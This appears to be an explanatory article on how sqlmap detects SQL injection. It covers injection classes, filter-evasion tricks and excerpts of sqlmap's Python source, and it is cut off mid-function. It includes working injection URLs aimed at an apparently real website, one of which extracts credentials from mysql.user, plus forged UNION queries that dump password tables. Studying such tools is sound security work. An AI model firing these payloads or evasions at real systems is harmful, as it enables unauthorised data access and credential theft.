SQL Injection Detection Techniques in sqlmap

https://github.com/henices/sqli
https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)

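SQL injection classes by channel

Inband

The SQL code is injected and the results are retrieved over the same channel (e.g. the browser). The retrieved data appears directly in the application's normal page output or in its error messages. This is the simplest type of attack.

Out-of-band

The queried data is sent back over a different channel (e.g. HTTP or DNS). This is a simple way to pull large amounts of data out of the database.

Inferential

No actual data is transferred, but the attacker can reconstruct the information by sending specific requests and observing how the database server's responses behave.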

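SQL injection classes by detection technique

boolean-based blind SQL injection

Also known as inferential SQL injection. sqlmap replaces or appends to the affected parameter in the HTTP request a syntactically valid SQL statement string containing a SELECT sub-statement, or any other SQL statement whose output the user wants to retrieve. For each HTTP response, it compares the headers/body with those of the original request, and in this way infers the output of the injected statement character by character. Alternatively, the user can provide a string or regular expression that matches the "true" page. The bisection algorithm that sqlmap implements for this technique can fetch each character of the output with at most seven HTTP requests. Where the output falls outside the plain-text character set, sqlmap adapts the algorithm to a wider range in order to detect it.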
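The "at most seven requests per character" figure follows from a binary search over the 128 values of 7-bit ASCII. The sketch below illustrates that idea only; it is not sqlmap's code. The helper name infer_char and the oracle callback is_greater_than are hypothetical and stand in for one HTTP request whose page is judged true or false.

```python
def infer_char(is_greater_than, low=0, high=127):
    """Recover one 7-bit ASCII code using only yes/no answers.

    is_greater_than(n) stands in for a single request such as
    "ASCII(SUBSTR(<query>, i, 1)) > n" (hypothetical oracle).
    """
    requests = 0
    while low < high:
        mid = (low + high) // 2
        requests += 1
        if is_greater_than(mid):
            low = mid + 1   # the code is in the upper half
        else:
            high = mid      # the code is in the lower half (or equals mid)
    return low, requests


# Simulate the oracle locally with a known "secret" output.
secret = "root@localhost"
recovered = []
max_requests = 0
for ch in secret:
    code, n = infer_char(lambda guess, c=ord(ch): c > guess)
    recovered.append(chr(code))
    max_requests = max(max_requests, n)

result = "".join(recovered)
print(result, max_requests)
```

With a range of 128 candidates the loop always halves the interval seven times, which is where the bound comes from; a wider character set needs more iterations.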

error-based SQL injection

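sqlmap replaces or appends to the affected HTTP parameter a database-specific statement that provokes an error, then parses the HTTP response headers and body, looking for DBMS error messages that contain the injected pre-defined chain of characters with the output of the SQL statement in between. This technique works only when the web application is configured to disclose back-end DBMS error messages.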
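Pulling the statement output out of an error message is a matter of searching between the two injected delimiters. A minimal sketch, assuming a hypothetical helper extract_between and a made-up MySQL-style error string (the delimiters :jlb: and :lpl: are the ones used in the example request later in this article):

```python
import re


def extract_between(response_text, start, stop):
    """Return the text enclosed by the start/stop markers, or None."""
    pattern = re.escape(start) + r"(.*?)" + re.escape(stop)
    match = re.search(pattern, response_text, re.S)
    return match.group(1) if match else None


# Hypothetical error page content, for illustration only.
error_page = "Duplicate entry ':jlb:5.1.73-log:lpl:1' for key 'group_key'"
version = extract_between(error_page, ":jlb:", ":lpl:")
missing = extract_between("no DBMS error on this page", ":jlb:", ":lpl:")
print(version, missing)
```

Random delimiters make it unlikely that ordinary page content is mistaken for injected output.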

time-based blind or stacked queries

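Also known as full blind SQL injection. sqlmap replaces or appends to the affected parameter in the HTTP request a syntactically valid SQL statement string containing a query that makes the back-end DBMS sleep for a number of seconds. For each HTTP response, it compares the response time with that of the original request, and in this way infers the output of the injected statement character by character. As with the boolean-based technique, the bisection algorithm is applied.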

UNION query SQL injection

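sqlmap appends to the affected parameter a syntactically valid SQL statement string starting with UNION ALL SELECT. This technique works when the web application page prints the output of the SELECT statement inside a loop, or something similar, so that every row of the query result shows up in the page content. sqlmap can also exploit partial (single-entry) UNION query SQL injection vulnerabilities, which occur when the output of the statement is not iterated in a loop and only the first entry of the query output is displayed.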

Stacked queries SQL injection

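Also known as multiple statements SQL injection. sqlmap tests whether the web application supports stacked queries and, if it does, appends to the affected parameter in the HTTP request a semicolon (;) followed by the SQL statement to be executed. This technique is useful for running SQL statements other than SELECT: depending on the back-end DBMS and the privileges of the session user, data definition and data manipulation statements may lead to file system read and write access and to operating system command execution.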

Techniques for evading SQL injection detection

Random case

INSERT => InsERt

Supported databases:

Database     Supported
MSSQL        Yes
MySQL        Yes
PostgreSQL   Yes
Oracle       Yes
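The transformation itself is tiny. A naive sketch, assuming a hypothetical helper random_case; it is not sqlmap's implementation, and it also changes the case of string literals, which a real tool would have to avoid:

```python
import random


def random_case(payload, rng=random):
    """Randomly upper- or lower-case every character of the payload."""
    return "".join(rng.choice((ch.lower(), ch.upper())) for ch in payload)


mutated = random_case("INSERT")
print(mutated)  # e.g. InsERt; the exact result differs on every run
```

SQL keywords are case-insensitive on the databases listed above, so the mutated keyword still parses while a case-sensitive filter no longer matches it.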

Replacing spaces with comments

SELECT id FROM users => SELECT/**/id/**/FROM/**/users

Supported databases:

Database     Supported
MSSQL        Yes
MySQL        Yes
PostgreSQL   Yes
Oracle       Yes
Access       No

Tested on Oracle 10g:

SQL> select/**/*/**/from v$version;

BANNER
----------------------------------------------------------------
Oracle Database 10g Enterprise Edition Release 10.1.0.3.0 - Prod
PL/SQL Release 10.1.0.3.0 - Production
CORE 10.1.0.3.0 Production
TNS for Linux: Version 10.1.0.3.0 - Production
NLSRTL Version 10.1.0.3.0 - Production

PostgreSQL:

postgres=# select/*abc*/version();
                                                               version
--------------------------------------------------------------------------------------------------------------------
PostgreSQL 8.1.4 on i686-pc-linux-gnu, compiled by GCC i686-pc-linux-gnu-gcc (GCC) 3.4.6 (Gentoo 3.4.6-r1, ssp-3.4.5-1.0, pie-8.7.9)
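The space-to-comment rewrite can be sketched as follows. The helper space_to_comment is hypothetical; it leaves spaces inside quoted literals alone but, as a simplifying assumption, does not handle escaped quotes.

```python
def space_to_comment(payload):
    """Replace spaces outside quoted literals with an empty SQL comment."""
    out = []
    quote = None  # the quote character we are currently inside, if any
    for ch in payload:
        if quote:
            if ch == quote:
                quote = None
            out.append(ch)
        elif ch in ("'", '"'):
            quote = ch
            out.append(ch)
        elif ch == " ":
            out.append("/**/")
        else:
            out.append(ch)
    return "".join(out)


rewritten = space_to_comment("SELECT id FROM users WHERE name='a b'")
print(rewritten)
```

Keeping literals untouched matters because changing 'a b' would change the meaning of the query rather than only its surface form.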

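Random comments

INSERT => IN/**/S/**/ERT

SQL syntax itself does not allow this, but it can defeat incorrect filtering (for example, a filter that strips comments before the statement reaches the DBMS).

postgres=# selec/**/t version();

ERROR: syntax error at or near "selec" at character 1
LINE 1: selec/**/t version();

Oracle:

SQL> sel/**/ect v$version;

SP2-0734: unknown command beginning "sel/**/ect..." - rest of line ignored.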

Replacing spaces with +

SELECT id FROM users => SELECT+id+FROM+users

Replacing spaces with random whitespace characters

SELECT id FROM users => SELECT\rid\tFROM\nusers

Database     Supported
MSSQL        Yes
MySQL        Yes
PostgreSQL   Yes
Oracle       Yes

Oracle:

$ echo -e "select\t*from\tv\$version;" | sqlplus "/ as sysdba"

SQL>
BANNER
----------------------------------------------------------------
Oracle Database 10g Enterprise Edition Release 10.1.0.3.0 - Prod
PL/SQL Release 10.1.0.3.0 - Production
CORE 10.1.0.3.0 Production
TNS for Linux: Version 10.1.0.3.0 - Production
NLSRTL Version 10.1.0.3.0 - Production

PostgreSQL:

$ echo -e "select\tversion();" | psql -U postgres
version
--------------------------------------------------------------------------------------------------------------------------------------
PostgreSQL 8.1.4 on i686-pc-linux-gnu, compiled by GCC i686-pc-linux-gnu-gcc (GCC) 3.4.6 (Gentoo 3.4.6-r1, ssp-3.4.5-1.0, pie-8.7.9)

URL encoding

'SELECT FIELD FROM%20TABLE' => '%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45'
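Encoding every byte as %XX, rather than only the reserved characters, can be sketched like this. The helper encode_all is hypothetical, and as a simplification it does not preserve sequences that are already percent-encoded, so the input here uses a plain space.

```python
from urllib.parse import unquote


def encode_all(payload):
    """Percent-encode every byte of the payload (lowercase hex)."""
    return "".join("%%%02x" % b for b in payload.encode("utf-8"))


encoded = encode_all("SELECT FIELD FROM TABLE")
decoded = unquote(encoded)  # the server-side decoding restores the text
print(encoded)
print(decoded)
```

The web server decodes the parameter before the application sees it, so the query is unchanged while a filter that inspects the raw request no longer sees the keyword SELECT.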

Replacing > with BETWEEN

'A > B' => 'A NOT BETWEEN 0 AND B'

Evading regular-expression detection

Use or 'a'='a' in place of or 1=1

DBMS identification techniques

Identifying the DBMS from error messages

<?xml version="1.0" encoding="UTF-8"?>

<root>
<!-- MySQL -->
<dbms value="MySQL">
<error regexp="SQL syntax.*MySQL"/>
<error regexp="Warning.*mysql_.*"/>
<error regexp="valid MySQL result"/>
<error regexp="MySqlClient\."/>
</dbms>

<!-- PostgreSQL -->
<dbms value="PostgreSQL">
<error regexp="PostgreSQL.*ERROR"/>
<error regexp="Warning.*\Wpg_.*"/>
<error regexp="valid PostgreSQL result"/>
<error regexp="Npgsql\."/>
</dbms>

<!-- Microsoft SQL Server -->
<dbms value="Microsoft SQL Server">
<error regexp="Driver.* SQL[\-\_\ ]*Server"/>
<error regexp="OLE DB.* SQL Server"/>
<error regexp="(\W|\A)SQL Server.*Driver"/>
<error regexp="Warning.*mssql_.*"/>
<error regexp="(\W|\A)SQL Server.*[0-9a-fA-F]{8}"/>
<error regexp="Exception Details:.*\WSystem\.Data\.SqlClient\."/>
<error regexp="Exception Details:.*\WRoadhouse\.Cms\."/>
</dbms>

<!-- Microsoft Access -->
<dbms value="Microsoft Access">
<error regexp="Microsoft Access Driver"/>
<error regexp="JET Database Engine"/>
<error regexp="Access Database Engine"/>
</dbms>

<!-- Oracle -->
<dbms value="Oracle">
<error regexp="ORA-[0-9][0-9][0-9][0-9]"/>
<error regexp="Oracle error"/>
<error regexp="Oracle.*Driver"/>
<error regexp="Warning.*\Woci_.*"/>
<error regexp="Warning.*\Wora_.*"/>
</dbms>

<!-- DB2 -->
<dbms value="DB2">
<error regexp="CLI Driver.*DB2"/>
<error regexp="DB2 SQL error"/>
</dbms>

<!-- Informix -->
<dbms value="Informix">
<error regexp="Exception.*Informix"/>
</dbms>

<!-- Interbase/Firebird -->
<dbms value="Firebird">
<error regexp="Dynamic SQL Error"/>
<error regexp="Warning.*ibase_.*"/>
</dbms>

<!-- SQLite -->
<dbms value="SQLite">
<error regexp="SQLite/JDBCDriver"/>
<error regexp="SQLite.Exception"/>
<error regexp="System.Data.SQLite.SQLiteException"/>
<error regexp="Warning.*sqlite_.*"/>
<error regexp="Warning.*SQLite3::"/>
</dbms>

<!-- SAP MaxDB -->
<dbms value="SAP MaxDB">
<error regexp="SQL error.*POS([0-9]+).*"/>
<error regexp="Warning.*maxdb.*"/>
</dbms>

<!-- Sybase -->
<dbms value="Sybase">
<error regexp="Warning.*sybase.*"/>
<error regexp="Sybase message"/>
<error regexp="Sybase.*Server message.*"/>
</dbms>

<!-- Ingres -->
<dbms value="Ingres">
<error regexp="Warning.*ingres_"/>
<error regexp="Ingres SQLSTATE"/>
<error regexp="Ingres\W.*Driver"/>
</dbms>

</root>
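Applying such a signature file amounts to trying each regular expression against the response until one matches. A minimal sketch, assuming a hypothetical helper guess_dbms and a hand-copied subset of the patterns above (it does not parse the XML file, and the sample error strings are illustrative):

```python
import re

# A few of the patterns listed above, keyed by DBMS name.
ERROR_SIGNATURES = {
    "MySQL": [r"SQL syntax.*MySQL", r"Warning.*mysql_.*"],
    "PostgreSQL": [r"PostgreSQL.*ERROR", r"Warning.*\Wpg_.*"],
    "Oracle": [r"ORA-[0-9][0-9][0-9][0-9]", r"Oracle error"],
}


def guess_dbms(page):
    """Return the first DBMS whose error signature appears in the page."""
    for dbms, patterns in ERROR_SIGNATURES.items():
        for pattern in patterns:
            if re.search(pattern, page, re.I):
                return dbms
    return None


guess = guess_dbms(
    "You have an error in your SQL syntax; check the manual that "
    "corresponds to your MySQL server version"
)
print(guess)
```

A match only suggests the back end; a front-end library can produce misleading messages, which is why fingerprinting is still needed for certainty.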

More precise identification requires DBMS fingerprinting techniques.

Requests used to detect SQL injection

  1. Check whether the parameter is dynamic

def checkDynParam(place, parameter, value):
    """
    This function checks if the url parameter is dynamic. If it is
    dynamic, the content of the page differs, otherwise the
    dynamicity might depend on another parameter.
    """

    kb.matchRatio = None

    infoMsg = "testing if %s parameter '%s' is dynamic" % (place, parameter)
    logger.info(infoMsg)

    # Generate a random integer to use as the new parameter value
    randInt = randomInt()
    payload = agent.payload(place, parameter, value, getUnicode(randInt))
    logger.debug("checkDynParam: %s", payload)
    dynResult = Request.queryPage(payload, place, raise404=False)

    # If the page is the same as the original one, the parameter is not dynamic
    if True == dynResult:
        return False

    infoMsg = "confirming that %s parameter '%s' is dynamic" % (place, parameter)
    logger.info(infoMsg)
    # Check a second time to confirm
    randInt = randomInt()
    payload = agent.payload(place, parameter, value, getUnicode(randInt))
    dynResult = Request.queryPage(payload, place, raise404=False)

    return not dynResult

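  2. Heuristic check: send a random string of length 10 made up of the characters ", ', ) and ( (generated with Python, RandomStr). If a known error comes back, report a possible SQL injection and the likely database.

  3. Depending on the risk and level settings, test with the payloads from payloads.xml.

  4. Check whether the URL is stable: request the URL twice in a row; if the returned content is exactly the same, the URL is considered stable.

  5. NullConnection: http://www.wisec.it/sectou.php?id=472f952d79293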

How to decide whether an injected payload succeeded

The comparison algorithm: boolean-based blind SQL injection

It uses difflib.SequenceMatcher and decides by page similarity. If the request ended in a DBMS or HTTP error page (and kb.errorIsNone is set), comparison() returns None instead of a True/False verdict.

def comparison(page, getRatioValue=False, pageLength=None):
    if page is None and pageLength is None:
        return None

    regExpResults = None

    seqMatcher = getCurrentThreadData().seqMatcher
    #logger.debug(kb.pageTemplate)
    seqMatcher.set_seq1(kb.pageTemplate)

    if page:
        # String to match in page when the query is valid
        # a.1 If the user-supplied string appears, return True
        if conf.string:
            condition = conf.string in page
            return condition if not getRatioValue else (MAX_RATIO if condition else MIN_RATIO)

        # Regular expression to match in page when the query is valid
        # a.2 If the user-supplied regular expression matches, return True
        if conf.regexp:
            condition = re.search(conf.regexp, page, re.I | re.M) is not None
            return condition if not getRatioValue else (MAX_RATIO if condition else MIN_RATIO)

        # In case of an DBMS error page return None
        if kb.errorIsNone and (wasLastRequestDBMSError() or wasLastRequestHTTPError()):
            return None

        # Dynamic content lines to be excluded before comparison
        # a.4 Strip the dynamic content from both pages before comparing
        if not kb.nullConnection:
            page = removeDynamicContent(page)
            seqMatcher.set_seq1(removeDynamicContent(kb.pageTemplate))

        if not pageLength:
            pageLength = len(page)

    # Null connection: only the page length is known, so compare lengths
    if kb.nullConnection and pageLength:
        if not seqMatcher.a:
            errMsg = "problem occured while retrieving original page content "
            errMsg += "which prevents sqlmap from continuation. please rerun, "
            errMsg += "and if problem persists please turn off optimization switches"
            raise sqlmapNoneDataException, errMsg

        ratio = 1. * pageLength / len(seqMatcher.a)

        if ratio > 1.:
            ratio = 1. / ratio
    else:
        # Normal connection: honour the textOnly command-line option
        seqMatcher.set_seq1(getFilteredPageContent(seqMatcher.a, True) if conf.textOnly else seqMatcher.a)
        seqMatcher.set_seq2(getFilteredPageContent(page, True) if conf.textOnly else page)
        # float 3 digits
        ratio = round(seqMatcher.quick_ratio(), 3)
        logger.debug('ratio: %s' % ratio)

    # If the url is stable and we did not set yet the match ratio and the
    # current injected value changes the url page content
    if kb.matchRatio is None:
        if kb.pageStable and ratio >= LOWER_RATIO_BOUND and ratio <= UPPER_RATIO_BOUND:
            kb.matchRatio = ratio
            logger.debug("setting match ratio for current parameter to %.3f" % kb.matchRatio)

        elif not kb.pageStable:
            # CONSTANT_RATIO = 0.900
            kb.matchRatio = CONSTANT_RATIO
            logger.debug("setting match ratio for current parameter to default value 0.900")

    # If it has been requested to return the ratio and not a comparison
    # response
    if getRatioValue:
        return ratio

    # ratio > 0.98: the two pages are considered the same
    elif ratio > UPPER_RATIO_BOUND:
        return True

    elif kb.matchRatio is None:
        return None

    else:
        # The url is not stable
        if kb.matchRatio == CONSTANT_RATIO:
            return ratio > kb.matchRatio
        else:
            # DIFF_TOLERANCE = 0.05 magic number
            return (ratio - kb.matchRatio) > DIFF_TOLERANCE
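The core of the similarity test can be tried in isolation with the standard library. This is a stripped-down sketch, not the function above: looks_same is a hypothetical helper, the sample pages are made up, and only the 0.98 upper bound quoted in the comments is reused.

```python
from difflib import SequenceMatcher

UPPER_RATIO_BOUND = 0.98  # value quoted in the comments of comparison()


def looks_same(template, page):
    """Compare a page with the original template by similarity ratio."""
    ratio = round(SequenceMatcher(None, template, page).quick_ratio(), 3)
    return ratio > UPPER_RATIO_BOUND, ratio


template = "<html><body>" + "Welcome back, admin. " * 20 + "</body></html>"
same, same_ratio = looks_same(template, template)
differs, diff_ratio = looks_same(template, "<html><body>No results</body></html>")
print(same, same_ratio, differs, diff_ratio)
```

quick_ratio() is an upper bound on ratio() that is cheaper to compute, which suits a tool that compares pages on every request.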


Removing dynamic content

def removeDynamicContent(page):
    """
    Removing dynamic content from supplied page basing removal on
    precalculated dynamic markings
    """

    if page:
        for item in kb.dynamicMarkings:
            prefix, suffix = item

            if prefix is None and suffix is None:
                continue
            elif prefix is None:
                page = getCompiledRegex('(?s)^.+%s' % suffix).sub(suffix, page)
            elif suffix is None:
                page = getCompiledRegex('(?s)%s.+$' % prefix).sub(prefix, page)
            else:
                page = getCompiledRegex('(?s)%s.+%s' % (prefix, suffix)).sub('%s%s' % (prefix, suffix), page)

    return page

# Finding dynamic content
def findDynamicContent(firstPage, secondPage):
    """
    This function checks if the provided pages have dynamic content. If they
    are dynamic, proper markings will be made
    """

    infoMsg = "searching for dynamic content"
    logger.info(infoMsg)

    # Get the blocks that match between the two pages
    blocks = SequenceMatcher(None, firstPage, secondPage).get_matching_blocks()
    kb.dynamicMarkings = []

    # Removing too small matching blocks
    i = 0
    while i < len(blocks):
        block = blocks[i]
        (_, _, length) = block

        # DYNAMICITY_MARK_LENGTH = 32
        if length <= DYNAMICITY_MARK_LENGTH:
            blocks.remove(block)

        else:
            i += 1

    # Making of dynamic markings based on prefix/suffix principle
    if len(blocks) > 0:

        # Add None before and after the blocks
        blocks.insert(0, None)
        blocks.append(None)

        for i in xrange(len(blocks) - 1):
            prefix = firstPage[blocks[i][0]:blocks[i][0] + blocks[i][2]] if blocks[i] else None
            suffix = firstPage[blocks[i + 1][0]:blocks[i + 1][0] + blocks[i + 1][2]] if blocks[i + 1] else None

            if prefix is None and blocks[i + 1][0] == 0:
                continue

            if suffix is None and (blocks[i][0] + blocks[i][2] >= len(firstPage)):
                continue

            # Trim letters and digits from the start and end of the strings
            prefix = trimAlphaNum(prefix)
            suffix = trimAlphaNum(suffix)

            kb.dynamicMarkings.append((re.escape(prefix[-DYNAMICITY_MARK_LENGTH/2:]) if prefix else None, re.escape(suffix[:DYNAMICITY_MARK_LENGTH/2]) if suffix else None))

    if len(kb.dynamicMarkings) > 0:
        infoMsg = "dynamic content marked for removal (%d region%s)" % (len(kb.dynamicMarkings), 's' if len(kb.dynamicMarkings) > 1 else '')
        logger.info(infoMsg)

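grep (regular expressions): error-based SQL injection

This check works against MS SQL Server, Oracle, MySQL and others. The injected statement queries a random string; if the body or the headers of the response contain the random string we constructed, the target is considered vulnerable. The concrete payloads can be found in sqlmap's payloads.xml. For example:

MySQL >= 5.0 AND error-based - WHERE or HAVING clause
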
http://to.goojje.com/qunba.php?ac=thread_qb&tid=9136%20AND%20(SELECT%209066%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,106,108,98,58),(MID((IFNULL(CAST(VERSION()%20AS%20CHAR),CHAR(32))),1,50)),CHAR(58,108,112,108,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)

After URL decoding:

http://to.goojje.com/qunba.php?ac=thread_qb&tid=9136 AND (SELECT 9066 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,108,98,58),(MID((IFNULL(CAST(VERSION() AS CHAR),CHAR(32))),1,50)),CHAR(58,108,112,108,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
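  • CONCAT: string concatenation
  • IFNULL: returns the second argument when the first one is NULL
  • CAST: converts a value to the given type (here, to CHAR)
  • MID: substring extraction, MID(string, position[, length])
  • CHAR(58,106,108,98,58) => :jlb:
  • CHAR(58,108,112,108,58) => :lpl: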
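The CHAR(...) calls are just character codes, so the delimiters can be checked by decoding them. A small sketch with a hypothetical helper decode_char_calls; as a simplification it would also rewrite a type such as CHAR(10000) inside a CAST, so it is only meant for reading payloads like the one above.

```python
import re


def decode_char_calls(sql):
    """Replace CHAR(n1,n2,...) with the quoted string it produces."""
    def repl(match):
        codes = [int(n) for n in match.group(1).split(",")]
        return "'" + "".join(chr(c) for c in codes) + "'"
    return re.sub(r"CHAR\(([\d,\s]+)\)", repl, sql)


decoded = decode_char_calls(
    "CONCAT(CHAR(58,106,108,98,58),VERSION(),CHAR(58,108,112,108,58))"
)
print(decoded)
```

Building the delimiters from character codes keeps quote characters out of the request, which helps when quotes are escaped or filtered.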

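This relies on a MySQL behaviour described in http://bugs.mysql.com/bug.php?id=32249: grouping by an expression that contains RAND() can raise a duplicate-entry error, and the error message echoes the grouped value.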

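Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause

No example was recorded for this case.

PostgreSQL AND error-based - WHERE or HAVING clause

No example was recorded for this case.

Oracle AND error-based - WHERE or HAVING clause (XMLType)

Note that the request recorded under this heading is a MySQL payload (it reads mysql.user with the same FLOOR(RAND(0)*2) construct as above), not an Oracle XMLType one.
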
http://to.goojje.com/qunba.php?ac=thread_qb&tid=9136 AND (SELECT 6531 FROM(SELECT COUNT(*),CONCAT(CHAR(58,121,121,98,58),(SELECT MID(IFNULL(CAST(concat(user,char(58),password) AS CHAR), CHAR(32)),1,50) FROM mysql.user LIMIT 0,1),CHAR(58,106,116,113,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

The unionTest() function: UNION query (inband) SQL injection

(1) Set the character and the comment used for the UNION
(2) Determine the number of columns of the UNION query

def forgeInbandQuery(self, query, position, count, comment, prefix, suffix, char, multipleUnions=None, limited=False):
    """
    Take in input an query (pseudo query) string and return its
    processed UNION ALL SELECT query.

    Examples:

    MySQL input: CONCAT(CHAR(120,121,75,102,103,89),IFNULL(CAST(user AS CHAR(10000)), CHAR(32)),CHAR(106,98,66,73,109,81),IFNULL(CAST(password AS CHAR(10000)), CHAR(32)),CHAR(105,73,99,89,69,74)) FROM mysql.user
    MySQL output: UNION ALL SELECT NULL, CONCAT(CHAR(120,121,75,102,103,89),IFNULL(CAST(user AS CHAR(10000)), CHAR(32)),CHAR(106,98,66,73,109,81),IFNULL(CAST(password AS CHAR(10000)), CHAR(32)),CHAR(105,73,99,89,69,74)), NULL FROM mysql.user-- AND 7488=7488

    PostgreSQL input: (CHR(116)||CHR(111)||CHR(81)||CHR(80)||CHR(103)||CHR(70))||COALESCE(CAST(usename AS CHARACTER(10000)), (CHR(32)))||(CHR(106)||CHR(78)||CHR(121)||CHR(111)||CHR(84)||CHR(85))||COALESCE(CAST(passwd AS CHARACTER(10000)), (CHR(32)))||(CHR(108)||CHR(85)||CHR(122)||CHR(85)||CHR(108)||CHR(118)) FROM pg_shadow
    PostgreSQL output: UNION ALL SELECT NULL, (CHR(116)||CHR(111)||CHR(81)||CHR(80)||CHR(103)||CHR(70))||COALESCE(CAST(usename AS CHARACTER(10000)), (CHR(32)))||(CHR(106)||CHR(78)||CHR(121)||CHR(111)||CHR(84)||CHR(85))||COALESCE(CAST(passwd AS CHARACTER(10000)), (CHR(32)))||(CHR(108)||CHR(85)||CHR(122)||CHR(85)||CHR(108)||CHR(118)), NULL FROM pg_shadow-- AND 7133=713

    Oracle input: (CHR(109)||CHR(89)||CHR(75)||CHR(109)||CHR(85)||CHR(68))||NVL(CAST(COLUMN_NAME AS VARCHAR(4000)), (CHR(32)))||(CHR(108)||CHR(110)||CHR(89)||CHR(69)||CHR(122)||CHR(90))||NVL(CAST(DATA_TYPE AS VARCHAR(4000)), (CHR(32)))||(CHR(89)||CHR(80)||CHR(98)||CHR(77)||CHR(80)||CHR(121)) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME=(CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(83))
    Oracle output: UNION ALL SELECT NULL, (CHR(109)||CHR(89)||CHR(75)||CHR(109)||CHR(85)||CHR(68))||NVL(CAST(COLUMN_NAME AS VARCHAR(4000)), (CHR(32)))||(CHR(108)||CHR(110)||CHR(89)||CHR(69)||CHR(122)||CHR(90))||NVL(CAST(DATA_TYPE AS VARCHAR(4000)), (CHR(32)))||(CHR(89)||CHR(80)||CHR(98)||CHR(77)||CHR(80)||CHR(121)), NULL FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME=(CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(83))-- AND 6738=6738

    Microsoft SQL Server input: (CHAR(74)+CHAR(86)+CHAR(106)+CHAR(116)+CHAR(116)+CHAR(108))+ISNULL(CAST(name AS VARCHAR(8000)), (CHAR(32)))+(CHAR(89)+CHAR(87)+CHAR(116)+CHAR(100)+CHAR(106)+CHAR(74))+ISNULL(CAST(master.dbo.fn_varbintohexstr(password) AS VARCHAR(8000)), (CHAR(32)))+(CHAR(71)+CHAR(74)+CHAR(68)+CHAR(66)+CHAR(85)+CHAR(106)) FROM master..sysxlogins
    Microsoft SQL Server output: UNION ALL SELECT NULL, (CHAR(74)+CHAR(86)+CHAR(106)+CHAR(116)+CHAR(116)+CHAR(108))+ISNULL(CAST(name AS VARCHAR(8000)), (CHAR(32)))+(CHAR(89)+CHAR(87)+CHAR(116)+CHAR(100)+CHAR(106)+CHAR(74))+ISNULL(CAST(master.dbo.fn_varbintohexstr(password) AS VARCHAR(8000)), (CHAR(32)))+(CHAR(71)+CHAR(74)+CHAR(68)+CHAR(66)+CHAR(85)+CHAR(106)), NULL FROM master..sysxlogins-- AND 3254=3254

    @param query: it is a processed query string unescaped to be
    forged within an UNION ALL SELECT statement
    @type query: C{str}

    @param position: it is the NULL position where it is possible
    to inject the query
    @type position: C{int}

    @return: UNION ALL SELECT query string forged
    @rtype: C{str}
    """

    if query.startswith("SELECT "):
        query = query[len("SELECT "):]

    inbandQuery = self.prefixQuery("UNION ALL SELECT ", prefix=prefix)

    if limited:
        inbandQuery += ",".join(map(lambda x: char if x != position else '(SELECT %s)' % query, xrange(0, count)))
        inbandQuery += FROM_TABLE.get(Backend.getIdentifiedDbms(), "")
        inbandQuery = self.suffixQuery(inbandQuery, comment, suffix)

        return inbandQuery

    topNumRegex = re.search("\ATOP\s+([\d]+)\s+", query, re.I)
    if topNumRegex:
        topNum = topNumRegex.group(1)
        query = query[len("TOP %s " % topNum):]
        inbandQuery += "TOP %s " % topNum

    intoRegExp = re.search("(\s+INTO (DUMP|OUT)FILE\s+\'(.+?)\')", query, re.I)

    if intoRegExp:
        intoRegExp = intoRegExp.group(1)
        query = query[:query.index(intoRegExp)]

    if Backend.getIdentifiedDbms() in FROM_TABLE and inbandQuery.endswith(FROM_TABLE[Backend.getIdentifiedDbms()]):
        inbandQuery = inbandQuery[:-len(FROM_TABLE[Backend.getIdentifiedDbms()])]

    for element in xrange(0, count):
        if element > 0:
            inbandQuery += ", "

        if element == position:
            if " FROM " in query and ("(CASE " not in query or ("(CASE " in query and "WHEN use" in query)) and "EXISTS(" not in query and not query.startswith("SELECT "):
                conditionIndex = query.index(" FROM ")
                inbandQuery += query[:conditionIndex]
            else:
                inbandQuery += query
        else:
            inbandQuery += char

    if " FROM " in query and ("(CASE " not in query or ("(CASE " in query and "WHEN use" in query)) and "EXISTS(" not in query and not query.startswith("SELECT "):
        conditionIndex = query.index(" FROM ")
        inbandQuery += query[conditionIndex:]

    if Backend.getIdentifiedDbms() in FROM_TABLE:
        if " FROM " not in inbandQuery or "(CASE " in inbandQuery or "(IIF" in inbandQuery:
            inbandQuery += FROM_TABLE[Backend.getIdentifiedDbms()]

    if intoRegExp:
        inbandQuery += intoRegExp

    if multipleUnions:
        inbandQuery += " UNION ALL SELECT "

        for element in xrange(count):
            if element > 0:
                inbandQuery += ", "

            if element == position:
                inbandQuery += multipleUnions
            else:
                inbandQuery += char

        if Backend.getIdentifiedDbms() in FROM_TABLE:
            inbandQuery += FROM_TABLE[Backend.getIdentifiedDbms()]

    inbandQuery = self.suffixQuery(inbandQuery, comment, suffix)

    return inbandQuery


def __findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=PAYLOAD.WHERE.ORIGINAL):
    """
    Finds number of columns affected by UNION based injection
    """
    retVal = None

    pushValue(kb.errorIsNone)
    items, ratios = [], []
    kb.errorIsNone = False
    lowerCount, upperCount = conf.uColsStart, conf.uColsStop

    if abs(upperCount - lowerCount) < MIN_UNION_RESPONSES:  # MIN_UNION_RESPONSES = 5
        upperCount = lowerCount + MIN_UNION_RESPONSES

    min_, max_ = MAX_RATIO, MIN_RATIO  # MAX_RATIO = 1.0, MIN_RATIO = 0.0

    for count in range(lowerCount, upperCount+1):
        query = agent.forgeInbandQuery('', -1, count, comment, prefix, suffix, conf.uChar)
        payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
        page, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
        ratio = comparison(page, True) or MIN_RATIO
        ratios.append(ratio)
        min_, max_ = min(min_, ratio), max(max_, ratio)
        items.append((count, ratio))

    ratios.pop(ratios.index(min_))  # pop the min
    ratios.pop(ratios.index(max_))  # pop the max

    deviation = stdev(ratios)  # compute the standard deviation

    if abs(max_ - min_) < MIN_STATISTICAL_RANGE:  # MIN_STATISTICAL_RANGE = 0.01
        return None

    # UNION_STDEV_COEFF = 7
    lower, upper = average(ratios) - UNION_STDEV_COEFF * deviation, average(ratios) + UNION_STDEV_COEFF * deviation
    minItem, maxItem = None, None

    for item in items:
